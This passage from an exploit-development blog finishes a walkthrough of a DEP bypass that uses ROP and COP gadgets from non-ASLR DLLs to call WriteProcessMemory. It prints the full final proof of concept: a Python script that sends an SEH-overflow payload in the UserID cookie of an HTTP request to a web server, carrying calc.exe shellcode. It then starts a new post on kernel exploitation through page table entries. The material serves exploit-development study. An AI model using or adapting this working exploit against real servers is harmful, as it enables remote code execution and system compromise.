crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write - and we can see we will be overwriting our parameter placeholder - as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!
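The ECX compensation can be sketched with a toy model of the stack. This is only an illustration: the stack is a plain Python dictionary, and both the stack address and the resolved function address are hypothetical values I picked, not values from the debugger.

```python
MASK32 = 0xFFFFFFFF
WRITE_OFFSET = 0x8  # displacement used by `mov dword [ecx+0x8], eax`

def arbitrary_write(stack, ecx, eax):
    """Model `mov dword [ecx+0x8], eax` against a dict-based stack."""
    stack[(ecx + WRITE_OFFSET) & MASK32] = eax

# Hypothetical stack slot that holds the parameter placeholder
placeholder_addr = 0x0012F000
stack = {placeholder_addr: 0x1004D1EC}  # placeholder value used in the POC

# ECX starts out pointing directly at the placeholder
ecx = placeholder_addr

# Eight `dec ecx ; ret` gadgets move ECX 0x8 bytes lower
for _ in range(WRITE_OFFSET):
    ecx = (ecx - 1) & MASK32

# Hypothetical resolved address of kernel32!WriteProcessMemory held in EAX
eax = 0x760012D3
arbitrary_write(stack, ecx, eax)

print(hex(stack[placeholder_addr]))
```

Because ECX was lowered by exactly the gadget's displacement, the write lands on the placeholder slot itself and nothing else in the toy stack is touched.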

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP - and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes lower than the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we need to increase ECX by 0x8 so that it contains the stack address in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP gadget.


# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is complete - and that we have hit our breakpoints!
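For those who like to see the register shuffling spelled out, below is a small sketch that models the last three steps (inc ecx eight times, mov eax, ecx, and xchg eax, esp). The register values are hypothetical and the function names are my own. It also shows why the add al, 0x39 side effect of the inc ecx gadget does not matter: EAX is overwritten by ECX right afterwards.

```python
MASK32 = 0xFFFFFFFF

def inc_ecx_add_al(regs):
    """Model `inc ecx ; add al, 0x39`. AL is the low byte of EAX and wraps at 8 bits."""
    regs["ecx"] = (regs["ecx"] + 1) & MASK32
    al = (regs["eax"] + 0x39) & 0xFF
    regs["eax"] = (regs["eax"] & 0xFFFFFF00) | al

def mov_eax_ecx(regs):
    """Model `mov eax, ecx`."""
    regs["eax"] = regs["ecx"]

def xchg_eax_esp(regs):
    """Model `xchg eax, esp`."""
    regs["eax"], regs["esp"] = regs["esp"], regs["eax"]

# Hypothetical stack slot that now holds the address of kernel32!WriteProcessMemory
target = 0x0012F000

# Hypothetical register state before the final routine (ECX is 0x8 short of the target)
regs = {"eax": 0x760012D3, "ecx": target - 0x8, "esp": 0x0012F400}
old_esp = regs["esp"]

for _ in range(8):
    inc_ecx_add_al(regs)   # EAX gets clobbered here, which is harmless
mov_eax_ecx(regs)          # EAX = stack address of the function pointer
xchg_eax_esp(regs)         # ESP now points at the function pointer

print("esp = " + hex(regs["esp"]))
```

Once ESP points at the overwritten placeholder, the ret at the end of the xchg gadget pops the function address into EIP, and the dwords that follow it on the stack line up as the return address and the five parameters.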

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP via "leave" - which will compensate for the ROP gadget which moves EAX into ECX)
crash += struct.pack('<L', 0x10018606)    # pop ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract ImageLoad.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative fffffd2d bytes away from kernel32!GetStartupInfoA (which is in the virtual parameter placeholder currently)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!WriteProcessMemory parameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)


# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS

Conclusion

Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().
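For anyone wanting to double check the COP arithmetic from the PoC, here is a rough Python model of the add edx, 0x20 ; push edx ; call edi gadget, with EDI pointing at the add esp, 0x8 ; ret gadget. The starting ESP value is hypothetical and the function name is my own. The point is that the push and the return address pushed by the call are both thrown away by add esp, 0x8, so each COP gadget behaves like a normal ROP gadget that just adds 0x20 to EDX.

```python
MASK32 = 0xFFFFFFFF

def cop_add_edx(regs):
    """Model `add edx, 0x20 ; push edx ; call edi` where EDI -> `add esp, 0x8 ; ret`."""
    regs["edx"] = (regs["edx"] + 0x20) & MASK32
    regs["esp"] -= 4   # push edx
    regs["esp"] -= 4   # call edi pushes a return address
    regs["esp"] += 8   # add esp, 0x8 (the gadget in EDI) discards both dwords
    regs["esp"] += 4   # ret pops the next entry in the chain

# xor edx, edx has already run; ESP value is a hypothetical stack address
regs = {"edx": 0, "esp": 0x0012F000}
start_esp = regs["esp"]

# Twelve COP gadgets build the nSize value
for _ in range(12):
    cop_add_edx(regs)
nsize = regs["edx"]

# Seven more build the distance later subtracted from EAX
for _ in range(7):
    cop_add_edx(regs)
distance = regs["edx"]

print("nSize = " + hex(nsize))
print("distance = " + hex(distance))
```

This lines up with the comments in the PoC: twelve gadgets give 0x180 for nSize, and seven more bring EDX to 0x260.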

Peace, love, and positivity :-)

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00

Introduction

Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register - or completely circumventing SMEP altogether by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations, as well as leveraging additional vulnerabilities such as an arbitrary read to bypass page table randomization to achieve said goals.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DEF CON 25 and Black Hat 2017.

